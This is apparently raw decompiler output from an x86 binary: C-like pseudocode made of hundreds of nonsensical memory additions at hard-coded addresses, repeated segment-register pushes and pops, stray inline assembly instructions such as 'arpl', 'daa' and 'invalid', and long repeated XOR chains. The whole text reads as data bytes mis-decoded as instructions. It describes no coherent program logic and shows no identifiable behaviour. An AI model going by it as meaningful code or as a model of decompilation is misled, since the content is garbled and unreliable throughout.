      				 *0xaf16cf00 =  *0xaf16cf00 + __edx;
      				 *0xc316cf00 =  *0xc316cf00 + __edx;
      				 *0xd716cf00 =  *0xd716cf00 + __edx;
      				 *0xdb16cf00 =  *0xdb16cf00 + __edx;
      				 *0xeb16cf00 =  *0xeb16cf00 + __edx;
      				 *0xfd16cf00 =  *0xfd16cf00 + __edx;
      				 *__ebx =  *__ebx + __edx;
      				 *((intOrPtr*)(__esi + 0x17)) =  *((intOrPtr*)(__esi + 0x17)) + __ebx;
      				 *[fs:0xd16cf00] =  *[fs:0xd16cf00] + __edx;
      				 *0x1b16cf00 =  *0x1b16cf00 + __esi;
      				 *__ebx =  *__ebx + __esi;
      				ss = ss;
      				asm("les edx, [edi]");
      				asm("les edx, [edi]");
      				_t458 = __ecx - 1;
      				 *__ebx =  *__ebx + __esi;
      				_pop(ss);
      				_pop(_t426);
      				 *_t426 =  *_t426 + __esi;
      				_pop(ss);
      				 *__eax =  *__eax + __esi;
      				_t427 = _t426 + _t458;
      				_push(ss);
      				if(_t427 <= 0) {
      				}
      				_t428 = _t427 + _t458;
      				 *_t428 =  *_t428 + _t540;
      				ss = ss;
      				asm("int3");
      				 *_t428 =  *_t428 + _t540;
      				ss = ss;
      				 *0xf016cf00 =  *0xf016cf00 + _t540;
      				 *0xf516cf00 =  *0xf516cf00 + _t540;
      				 *_t428 =  *_t428 + _t540;
      				_pop(ss);
      				asm("adc al, [edx]");
      				_pop(ss);
      				_pop(ss);
      				asm("popad");
      				_t492 = _t489 +  *_t428 +  *_t428 +  *_t428;
      				_t296 = (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00) + (((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) + ((_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) + (_t458 ^ 0xa816cf00) ^ 0xdd16cf00) ^ 0x2b16cf00);
      				_pop(ss);
      				if(_t296 >= 0) {
      					_t296 = _t296 ^  *_t296;
      				}
      				asm("les edx, [edi]");
      				asm("les edx, [edi]");
      				_t541 = _t296 ^  *_t296;
      				_pop(ss);
      				_pop(ss);
      				asm("sti");
      				 *((intOrPtr*)(_t541 + 0x17)) =  *((intOrPtr*)(_t541 + 0x17)) + _t428;
      				_pop(ss);
      				_t304 = ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00) + ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00) + ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00) + ((_t540 + _t540 ^ 0xc716cf00) + (_t540 + _t540 ^ 0xc716cf00) ^ 0x1816cf00);
      				ss = _t558;
      				_t551 = _t541 +  *0x2d16cf00 +  *0x4416cf00 +  *_t428 +  *_t428 +  *0x6b16cf00 +  *0x8816cf00 +  *0x9916cf00 +  *0x9e16cf00 +  *0xaf16cf00 +  *0xc216cf00;
      				_t498 = _t492 +  *0xa516cf00 +  *_t428 +  *0xd816cf00 +  *_t428 +  *_t428 +  *((intOrPtr*)(_t304 + 0x20));
      				 *_t304 =  *_t304 + _t304;
      				 *_t304 =  *_t304 + _t304;
      				asm("adc [eax], bl");
      				_t305 = _t304 |  *_t304;
      				 *_t305 =  *_t305 + _t305;
      				_t563 = cs;
      				 *_t305 =  *_t305 & _t305;
      				 *_t305 =  *_t305 + _t305;
      				 *((intOrPtr*)(_t551 + 0xe0e6318)) =  *((intOrPtr*)(_t551 + 0xe0e6318)) + _t305;
      				 *2 =  *2 + _t305;
      				 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x20)) + _t498;
      				 *_t305 =  *_t305 + _t305;
      				 *_t305 =  *_t305 | _t305;
      				_t461 = _t305;
      				 *((intOrPtr*)(_t558 + 0xe)) =  *((intOrPtr*)(_t558 + 0xe)) + _t461;
      				 *0x22 = 0x22 +  *0x22;
      				 *0x22 =  *0x22 | 0x00000022;
      				_t310 = _t551;
      				 *((intOrPtr*)(_t536 + 0x200130e)) =  *((intOrPtr*)(_t536 + 0x200130e)) + 2;
      				 *((intOrPtr*)(_t310 + 0x23)) =  *((intOrPtr*)(_t310 + 0x23)) + _t498;
      				 *_t310 =  *_t310 + _t310;
      				 *_t310 =  *_t310 | _t310;
      				_t311 = _t428;
      				_t429 = _t310;
      				 *((intOrPtr*)(_t461 + 0x200180e)) =  *((intOrPtr*)(_t461 + 0x200180e)) + _t498;
      				 *((intOrPtr*)(_t311 + 0x8000023)) =  *((intOrPtr*)(_t311 + 0x8000023)) + _t498;
      				 *((intOrPtr*)(_t429 + 0x180ed300)) =  *((intOrPtr*)(_t429 + 0x180ed300)) + _t498;
      				 *_t498 =  *_t498 + _t311;
      				 *((intOrPtr*)(_t311 + 0x8000023)) =  *((intOrPtr*)(_t311 + 0x8000023)) + _t498;
      				 *((intOrPtr*)(_t429 + 0x1c0ef500)) =  *((intOrPtr*)(_t429 + 0x1c0ef500)) + _t498;
      				 *_t498 =  *_t498 + _t311;
      				_t313 = _t311 + _t498 &  *(_t311 + _t498);
      				 *_t313 =  *_t313 + 2;
      				 *((intOrPtr*)(_t429 + 0x1c0f3900)) =  *((intOrPtr*)(_t429 + 0x1c0f3900)) + _t498;
      				 *0x23f400 =  *0x23f400 + _t313;
      				 *_t313 =  *_t313 + _t313;
      				 *((intOrPtr*)(_t461 + 0xa0e5c18)) =  *((intOrPtr*)(_t461 + 0xa0e5c18)) + _t498;
      				 *_t313 =  *_t313 + 2;
      				 *_t563 =  *_t563 + 2;
      				 *_t313 =  *_t313 + _t313;
      				 *0x270E633A =  *((intOrPtr*)(0x270e633a)) + _t313;
      				 *_t313 =  *_t313 + 2;
      				 *((intOrPtr*)(_t313 + 0x24)) =  *((intOrPtr*)(_t313 + 0x24)) + 0x22;
      				 *_t313 =  *_t313 + _t313;
      				 *_t313 =  *_t313 + _t313;
      				_t430 = _t313;
      				 *((intOrPtr*)(_t558 + 0xf)) =  *((intOrPtr*)(_t558 + 0xf)) + _t430;
      				_t315 = _t429 |  *_t429;
      				 *_t315 =  *_t315 | _t315;
      				if( *_t315 >= 0) {
      					 *_t315 =  *_t315 + _t315;
      					 *_t315 =  *_t315 + _t315;
      					_t423 = _t461;
      					_t488 = _t315;
      					 *((intOrPtr*)(_t536 + 0x8002b0f)) =  *((intOrPtr*)(_t536 + 0x8002b0f)) + _t430;
      					 *((intOrPtr*)(_t423 + 0x24)) =  *((intOrPtr*)(_t423 + 0x24)) + _t430;
      					 *((intOrPtr*)(_t488 + 0x34100500)) =  *((intOrPtr*)(_t488 + 0x34100500)) + _t498;
      					 *_t498 =  *_t498 + 2;
      					 *0 =  *0 + _t498;
      					_t315 = _t488;
      					_t461 = _t423;
      					 *((intOrPtr*)(_t461 + 0x10)) =  *((intOrPtr*)(_t461 + 0x10)) + 2;
      				}
      				_t317 = _t315 -  *_t315 |  *(_t315 -  *_t315);
      				 *0 = _t317;
      				_t318 = _t461;
      				_t462 = _t317;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *0x25ec00 =  *0x25ec00 + _t462;
      				 *_t318 =  *_t318 + _t318;
      				 *((intOrPtr*)(0x270e633a)) =  *((intOrPtr*)(0x270e633a)) + _t318;
      				 *0x260000 =  *0x260000 + _t462;
      				 *_t318 =  *_t318 + _t318;
      				 *((intOrPtr*)(_t430 + 0x4110d100)) =  *((intOrPtr*)(_t430 + 0x4110d100)) + _t498;
      				 *0x261c00 =  *0x261c00 + _t462;
      				 *_t318 =  *_t318 + _t318;
      				 *((intOrPtr*)(_t430 + 0x46111500)) =  *((intOrPtr*)(_t430 + 0x46111500)) + _t498;
      				 *0x22 =  *0x22 + _t462;
      				 *0x22 =  *0x22 + _t498;
      				 *_t318 =  *_t318 + _t318;
      				 *_t318 =  *_t318 + _t318;
      				_t319 = _t430;
      				_t431 = _t318;
      				 *_t536 =  *_t536 + _t498;
      				asm("adc [ebx], ecx");
      				asm("str word [esi]");
      				 *_t319 =  *_t319 + _t319;
      				 *((intOrPtr*)(_t431 + 0x50115900)) =  *((intOrPtr*)(_t431 + 0x50115900)) + _t498;
      				 *_t319 =  *_t319 + _t498;
      				 *((intOrPtr*)(_t319 + 0x26)) =  *((intOrPtr*)(_t319 + 0x26)) + _t462;
      				 *_t319 =  *_t319 + _t319;
      				 *_t319 =  *_t319 + _t319;
      				_t320 = _t431;
      				_t432 = _t319;
      				 *((intOrPtr*)(_t432 + 0x11)) =  *((intOrPtr*)(_t432 + 0x11)) + _t432;
      				_push(_t558);
      				 *_t462 =  *_t462 + _t498;
      				 *((intOrPtr*)(_t320 + 0x27)) =  *((intOrPtr*)(_t320 + 0x27)) + _t462;
      				 *_t320 =  *_t320 + _t320;
      				 *_t320 =  *_t320 + _t320;
      				_t321 = _t462;
      				_t463 = _t320;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t432 =  *_t432 + _t498;
      				 *_t536 =  *_t536 + _t463;
      				_t433 =  *_t321;
      				 *_t321 = _t432;
      				asm("arpl [esi], cx");
      				asm("daa");
      				 *_t433 =  *_t433 + _t498;
      				_t322 = _t321 + _t321;
      				asm("daa");
      				 *_t322 =  *_t322 + _t322;
      				 *_t322 =  *_t322 + _t322;
      				_t323 = _t433;
      				_t434 = _t322;
      				 *((intOrPtr*)(_t536 + 0x13005c11)) =  *((intOrPtr*)(_t536 + 0x13005c11)) + _t434;
      				 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t323;
      				 *((intOrPtr*)(_t463 + 0xa0e5c18)) =  *((intOrPtr*)(_t463 + 0xa0e5c18)) + _t498;
      				 *((intOrPtr*)(_t323 + _t323)) =  *((intOrPtr*)(_t323 + _t323)) + _t498;
      				asm("cld");
      				 *_t323 =  *_t323 - _t323;
      				 *_t323 =  *_t323 + _t323;
      				 *((intOrPtr*)(0x270e633a)) =  *((intOrPtr*)(0x270e633a)) + _t323;
      				 *((intOrPtr*)(_t323 + _t323)) =  *((intOrPtr*)(_t323 + _t323)) + _t498;
      				asm("adc [ecx], ch");
      				 *_t323 =  *_t323 + _t323;
      				 *_t323 =  *_t323 + _t323;
      				_t324 = _t463;
      				 *0x14003410 =  *0x14003410 + _t324;
      				 *((intOrPtr*)(_t324 + 0x29)) =  *((intOrPtr*)(_t324 + 0x29)) + _t498;
      				 *_t324 =  *_t324 + _t324;
      				 *_t324 =  *_t324 + _t324;
      				_t325 = _t323;
      				_t465 = _t324;
      				 *((intOrPtr*)(_t434 + 0x15006b12)) =  *((intOrPtr*)(_t434 + 0x15006b12)) + _t465;
      				 *((intOrPtr*)(_t498 + _t558)) =  *((intOrPtr*)(_t498 + _t558)) + _t325;
      				 *_t325 =  *_t325 + _t325;
      				 *_t325 =  *_t325 + _t325;
      				_t326 = _t434;
      				_t435 = _t325;
      				 *((intOrPtr*)(_t558 + 0x16007212)) =  *((intOrPtr*)(_t558 + 0x16007212)) + _t465;
      				 *((intOrPtr*)(_t498 + _t558)) =  *((intOrPtr*)(_t498 + _t558)) + _t326;
      				 *_t326 =  *_t326 + _t326;
      				 *((intOrPtr*)(_t435 + 0x7912f100)) =  *((intOrPtr*)(_t435 + 0x7912f100)) + _t498;
      				 *_t536 =  *_t536 + _t498;
      				 *((intOrPtr*)(_t326 + 0x2a)) =  *((intOrPtr*)(_t326 + 0x2a)) + _t435;
      				 *((intOrPtr*)(_t435 - 0x7eeced00)) =  *((intOrPtr*)(_t435 - 0x7eeced00)) + _t498;
      				 *_t465 =  *_t465 + _t435;
      				_t329 = _t465;
      				_t466 = _t326 + _t465;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t435 =  *_t435 + _t435;
      				 *((intOrPtr*)(0x22 + _t558)) =  *((intOrPtr*)(0x22 + _t558)) + _t329;
      				 *_t329 =  *_t329 + _t329;
      				 *_t329 =  *_t329 + _t329;
      				_t436 =  *_t329;
      				 *_t329 = _t435;
      				asm("arpl [esi], cx");
      				asm("daa");
      				 *_t436 =  *_t436 + _t436;
      				 *_t329 =  *_t329 + _t436;
      				 *[cs:eax] =  *[cs:eax] + _t329;
      				 *_t329 =  *_t329 + _t329;
      				 *_t329 =  *_t329 | 0x008c1621;
      				asm("sbb eax, [eax]");
      				 *0x22 =  *0x22 - _t466;
      				 *_t329 =  *_t329 + _t329;
      				 *_t329 =  *_t329 + _t329;
      				_t553 = _t329;
      				 *((intOrPtr*)(_t536 + 0x16)) =  *((intOrPtr*)(_t536 + 0x16)) + 0x22;
      				 *_t436 =  *_t436 + _t436;
      				 *((intOrPtr*)(0x22 + _t553)) =  *((intOrPtr*)(0x22 + _t553)) + _t498;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t553 =  *_t553 + _t436;
      				_t332 = _t466 + _t436;
      				 *_t332 =  *_t332 ^ _t332;
      				 *_t332 =  *_t332 + _t332;
      				 *((intOrPtr*)(_t553 + 0x270e6318)) =  *((intOrPtr*)(_t553 + 0x270e6318)) + _t332;
      				 *_t553 =  *_t553 + _t436;
      				 *((intOrPtr*)(0x22 + _t553)) =  *((intOrPtr*)(0x22 + _t553)) + 0x22;
      				 *_t332 =  *_t332 + _t332;
      				 *_t332 =  *_t332 + _t332;
      				_t333 = _t553;
      				_t554 = _t332;
      				 *((intOrPtr*)(_t536 + 0x16)) =  *((intOrPtr*)(_t536 + 0x16)) + _t333;
      				 *_t554 =  *_t554 + _t436;
      				 *_t333 =  *_t333 + _t498;
      				_t334 = _t333 ^  *_t333;
      				 *_t334 =  *_t334 + _t334;
      				 *0x0A0E5C3A =  *((intOrPtr*)(0xa0e5c3a)) + _t498;
      				 *0x22 =  *0x22 + _t334;
      				 *((intOrPtr*)(_t334 + 0x33)) =  *((intOrPtr*)(_t334 + 0x33)) + 0x22;
      				 *_t334 =  *_t334 + _t334;
      				 *_t334 =  *_t334 + _t334;
      				_t437 =  *_t334;
      				 *_t334 = _t436;
      				asm("arpl [esi], cx");
      				asm("daa");
      				 *0x22 =  *0x22 + _t334;
      				 *((intOrPtr*)(_t437 + _t554)) =  *((intOrPtr*)(_t437 + _t554)) + _t437;
      				 *_t334 =  *_t334 + _t334;
      				 *((intOrPtr*)(_t554 - 0x6fe9b900)) =  *((intOrPtr*)(_t554 - 0x6fe9b900)) + _t498;
      				 *0x22 =  *0x22 + _t334;
      				 *_t334 =  *_t334 + _t334;
      				 *_t334 =  *_t334 + _t334;
      				 *_t437 =  *_t437 + _t334;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t334;
      				 *((intOrPtr*)(_t334 + _t334)) =  *((intOrPtr*)(_t334 + _t334)) + _t334;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t337 = _t334 ^ 0x00000000 |  *(_t334 ^ 0x00000000);
      				 *[es:eax] =  *[es:eax] + _t337;
      				 *_t337 =  *_t337 + _t337;
      				 *_t437 =  *_t437 + _t337;
      				_t499 = _t498 + _t337;
      				_t468 = 0x22 + _t554;
      				_push(ss);
      				_push(ss);
      				_t340 = ( *0xb0002600 ^ 0x00000000) + _t437;
      				_push(ss);
      				 *_t340 =  *_t340 - _t340;
      				 *_t340 =  *_t340 + _t340;
      				 *_t340 =  *_t340 + _t340;
      				_t341 = _t340 +  *_t340;
      				 *_t341 = _t437;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t499 =  *_t499 + _t468;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t345 = _t341 + _t341 ^ 0x00000000 |  *(_t341 + _t341 ^ 0x00000000);
      				 *_t345 =  *_t345 + _t345;
      				 *_t345 =  *_t345 + _t345;
      				 *_t468 = 0xf1;
      				_push(ss);
      				_push(ss);
      				_t348 = _t345 +  *_t345;
      				_push(ss);
      				 *_t348 =  *_t348 + _t348;
      				 *0x2e00 =  *0x2e00 + _t348;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t348;
      				 *_t348 =  *_t348 + _t499;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t352 = (_t348 + _t468 ^ 0x00000000 |  *(_t348 + _t468 ^ 0x00000000)) ^  *(_t348 + _t468 ^ 0x00000000 |  *(_t348 + _t468 ^ 0x00000000));
      				 *_t352 =  *_t352 + _t352;
      				 *_t352 =  *_t352 + _t352;
      				_t353 = _t352 +  *_t352;
      				 *_t468 = 0xf1;
      				_push(ss);
      				 *_t353 = 0x36000032;
      				 *_t353 =  *_t353 + _t353;
      				 *_t353 =  *_t353 + _t353;
      				_push(ss);
      				_t354 = _t353 + 0x2e00;
      				asm("int3");
      				 *0x2e00 =  *0x2e00 + _t499;
      				 *_t354 =  *_t354 + _t499;
      				 *[ss:eax] =  *[ss:eax] + _t354;
      				 *_t354 =  *_t354 + _t354;
      				 *_t499 =  *_t499;
      				ss = ss;
      				asm("rol dword [eax], 1");
      				 *0x00002E00 =  *((intOrPtr*)(0x2e00)) + 0x2e00;
      				 *((intOrPtr*)(0x2e00)) =  *((intOrPtr*)(0x2e00)) + 0x2e00;
      				_t357 = 0x2e00 +  *((intOrPtr*)(0x2e00));
      				 *_t357 = _t354;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *0x361800 =  *0x361800 + _t499;
      				 *_t357 =  *_t357 + _t357;
      				 *_t468 =  *_t468 + _t499;
      				asm("sbb [esi+ecx+0xa], bl");
      				 *_t536 =  *_t536 + _t499;
      				 *_t357 =  *_t357 + _t357;
      				 *_t357 =  *_t357 + _t357;
      				 *((intOrPtr*)( *_t357)) =  *((intOrPtr*)( *_t357)) + _t357;
      				_t500 = _t499 + _t357;
      				_push(ss);
      				asm("aaa");
      				 *_t357 =  *_t357 + _t500;
      				 *[ss:eax] =  *[ss:eax] + _t357;
      				 *_t357 =  *_t357 + _t357;
      				_push(ss);
      				_t358 = _t357;
      				_push(ss);
      				 *_t358 =  *_t358 + _t358;
      				 *0x3900 =  *0x3900 + _t358;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t358;
      				 *0x3900 = 0x3900 +  *0x3900;
      				 *((intOrPtr*)(_t358 + 0x36)) =  *((intOrPtr*)(_t358 + 0x36)) + _t358;
      				 *_t358 =  *_t358 + _t358;
      				 *_t358 =  *_t358 + _t358;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t359 = _t358 |  *_t358;
      				 *0x3900 =  *0x3900 + _t359;
      				_t501 = _t500 + _t359;
      				_t470 = _t468 + _t554 + _t554;
      				_push(ss);
      				asm("fild word [eax]");
      				 *_t359 =  *_t359 + _t359;
      				 *_t554 =  *_t554 + _t501;
      				_t360 = 0x3900 + _t359;
      				_push(ss);
      				asm("in eax, 0x0");
      				 *[ds:eax] =  *[ds:eax] + _t360;
      				 *_t360 =  *_t360 + _t360;
      				 *0x3900 =  *0x3900 + _t360;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t360;
      				 *_t536 =  *_t536 + 0x3900;
      				 *((intOrPtr*)(_t360 + 0x36)) =  *((intOrPtr*)(_t360 + 0x36)) + _t470;
      				 *_t360 =  *_t360 + _t360;
      				 *_t360 =  *_t360 + _t360;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t361 = _t360 |  *_t360;
      				 *_t361 =  *_t361 + _t361;
      				 *_t361 =  *_t361 + _t361;
      				 *0x3900 =  *0x3900 + _t361;
      				_t502 = _t501 + _t361;
      				_t472 = _t470 + 1 + _t554;
      				_push(ss);
      				asm("out dx, eax");
      				 *_t472 =  *_t472 + _t361;
      				 *_t554 =  *_t554 ^ 0x00000000;
      				 *_t361 =  *_t361 + _t361;
      				 *_t554 =  *_t554 + _t502;
      				_t362 = 0x3900 + _t361;
      				_push(ss);
      				 *_t362 =  *_t362 + _t362;
      				 *_t362 =  *_t362 + _t362;
      				 *0x3900 =  *0x3900 + _t362;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + _t362;
      				 *_t558 =  *_t558 + _t362;
      				 *[ss:eax] =  *[ss:eax] + _t362;
      				 *_t362 =  *_t362 + _t362;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t363 = _t362 |  *_t362;
      				_t537 = _t536 + 1;
      				 *_t363 =  *_t363 + _t363;
      				 *_t363 =  *_t363 + _t363;
      				 *0x3900 =  *0x3900 + _t363;
      				_t503 = _t502 + _t363;
      				_t473 = _t472 + _t554;
      				_push(ss);
      				asm("out dx, eax");
      				 *_t537 =  *_t537 + _t363;
      				 *_t363 =  *_t363 + _t363;
      				 *_t363 =  *_t363 + _t363;
      				_push(ss);
      				_t364 = 0x3900 + _t363;
      				_push(ss);
      				 *((intOrPtr*)(_t364 + 0x36)) =  *((intOrPtr*)(_t364 + 0x36)) + 0x3900;
      				 *0x01177500 =  *((intOrPtr*)(0x1177500)) + _t503;
      				 *0x3900 =  *0x3900 + _t473;
      				 *_t554 =  *_t554 << 0;
      				 *_t364 =  *_t364 + _t364;
      				 *((intOrPtr*)(_t473 + 0xa178000)) =  *((intOrPtr*)(_t473 + 0xa178000)) + _t503;
      				 *0x3900 =  *0x3900 + _t473;
      				asm("les esi, [esi]");
      				 *_t364 =  *_t364 + _t364;
      				 *_t364 =  *_t364 + _t364;
      				_t445 = _t364;
      				 *((intOrPtr*)(_t503 + 0x4b010717)) =  *((intOrPtr*)(_t503 + 0x4b010717)) + 0x3900;
      				 *0x3900 = 0x3900 +  *0x3900;
      				 *0x3900 = 0x3900 +  *0x3900;
      				 *_t445 =  *_t445 + 0x3900;
      				 *((intOrPtr*)(_t554 - 0x64f19ce8)) =  *((intOrPtr*)(_t554 - 0x64f19ce8)) + 0x3900;
      				 *0x000071CC =  *((intOrPtr*)(0x71cc)) + _t473;
      				 *[ss:eax] =  *[ss:eax] + 0x3900;
      				 *0x3900 = 0x3900 +  *0x3900;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t366 = 0x00003900 |  *0x3900;
      				_t555 = _t554 - 1;
      				 *_t366 =  *_t366 + _t366;
      				 *_t366 =  *_t366 + _t366;
      				 *_t445 =  *_t445 + _t366;
      				_t504 = _t503 + _t366;
      				_t474 = _t473 + _t555;
      				_push(ss);
      				asm("adc [ecx], eax");
      				_t556 = _t555 - 1;
      				_t367 = _t366 + _t366;
      				 *[ss:eax] =  *[ss:eax] + _t367;
      				 *_t367 =  *_t367 + _t367;
      				_push(ss);
      				_t368 = _t367 + _t445;
      				_push(ss);
      				_push(ss);
      				 *_t537 =  *_t537 + _t474;
      				 *_t368 =  *_t368 + _t368;
      				 *_t368 =  *_t368 + _t368;
      				_t369 = _t368 +  *_t368;
      				_t446 =  *_t369;
      				 *_t369 = _t445;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t369 =  *_t369 + _t504;
      				asm("hlt");
      				 *[ss:eax] =  *[ss:eax] + _t369;
      				 *_t369 =  *_t369 + _t369;
      				asm("adc [eax], ebx");
      				_push(cs);
      				_t370 = _t369 |  *_t369;
      				_push(_t504);
      				 *_t370 =  *_t370 + _t370;
      				 *_t370 =  *_t370 + _t370;
      				 *_t446 =  *_t446 + _t370;
      				_t505 = _t504 + _t370;
      				ds = ss;
      				 *_t505 =  *_t505 + _t505;
      				_t371 = _t370 | 0x00000037;
      				 *_t371 =  *_t371 + _t371;
      				 *_t371 =  *_t371 + _t371;
      				_push(ss);
      				_push(ss);
      				_t373 = _t371 + _t446 & 0x00005401;
      				 *_t373 =  *_t373 + _t373;
      				 *_t446 =  *_t446 + _t373;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t373;
      				 *_t556 =  *_t556 + _t505;
      				asm("sbb al, 0x37");
      				 *_t373 =  *_t373 + _t373;
      				 *_t373 =  *_t373 + _t373;
      				asm("adc [eax], ebx");
      				_t375 = cs;
      				 *_t375 =  *_t375 + _t375;
      				 *_t375 =  *_t375 + _t375;
      				 *_t446 =  *_t446 + _t375;
      				asm("das");
      				 *_t375 =  *_t375 + _t446;
      				_t376 = _t375 ^ 0x00000037;
      				 *_t376 =  *_t376 + _t376;
      				 *_t376 =  *_t376 + _t376;
      				ss = ss;
      				_t378 = ss;
      				 *_t378 =  *_t378 + _t378;
      				 *_t378 =  *_t378 + _t378;
      				 *_t446 =  *_t446 + _t378;
      				 *((intOrPtr*)(_t556 - 0x64f19ce8)) =  *((intOrPtr*)(_t556 - 0x64f19ce8)) + _t378;
      				 *_t378 =  *_t378 + _t446;
      				_t379 = _t378 + 1;
      				asm("aaa");
      				 *_t379 =  *_t379 + _t379;
      				 *_t379 =  *_t379 + _t379;
      				asm("adc [eax], ebx");
      				_t380 = _t379 |  *_t379;
      				_t508 = cs;
      				 *_t380 =  *_t380 + _t380;
      				 *_t380 =  *_t380 + _t380;
      				 *_t446 =  *_t446 + _t380;
      				_push(ss);
      				asm("aaa");
      				 *_t380 =  *_t380 + _t380;
      				 *_t380 =  *_t380 + _t380;
      				_t510 = _t508 + _t380 + _t380;
      				ss = ss;
      				_t447 = _t446 + 1;
      				 *_t510 =  *_t510 + _t447;
      				 *_t380 =  *_t380 + _t380;
      				 *_t380 =  *_t380 + _t380;
      				_t381 = _t380 +  *_t380;
      				_t448 =  *_t381;
      				 *_t381 = _t447;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t510 =  *_t510 + _t448;
      				asm("aaa");
      				 *_t381 =  *_t381 + _t381;
      				 *_t381 =  *_t381 + _t381;
      				asm("adc [eax], ebx");
      				_t382 = _t381 |  *_t381;
      				_t575 = cs;
      				 *_t382 =  *_t382 + _t382;
      				 *_t382 =  *_t382 + _t382;
      				 *_t448 =  *_t448 + _t382;
      				_push(ss);
      				_t559 = _t558 - 1;
      				 *((intOrPtr*)(_t382 + _t382 + 0x7c)) =  *((intOrPtr*)(_t382 + _t382 + 0x7c)) + _t448;
      				asm("aaa");
      				 *_t382 =  *_t382 + _t382;
      				 *_t382 =  *_t382 + _t382;
      				_t512 = _t510 + _t382 + _t382;
      				ss = ss;
      				 *_t537 =  *_t537 + _t448;
      				 *_t382 =  *_t382 + _t382;
      				 *_t382 =  *_t382 + _t382;
      				_t383 = _t382 +  *_t382;
      				_t449 =  *_t383;
      				 *_t383 = _t448;
      				asm("arpl [esi], cx");
      				asm("wait");
      				 *_t512 =  *_t512 + _t383;
      				asm("invalid");
      				 *_t383 =  *_t383 + _t383;
      				 *_t383 =  *_t383 + _t383;
      				asm("adc [eax], ebx");
      				_t576 = _t575;
      				_push(cs);
      				_t384 = _t383 |  *_t383;
      				 *[fs:eax] =  *[fs:eax] + _t384;
      				 *_t384 =  *_t384 + _t384;
      				 *_t449 =  *_t449 + _t384;
      				_t538 = ss;
      				 *((intOrPtr*)(_t384 + _t384 - 0x5c)) =  *((intOrPtr*)(_t384 + _t384 - 0x5c)) + _t576;
      				asm("aaa");
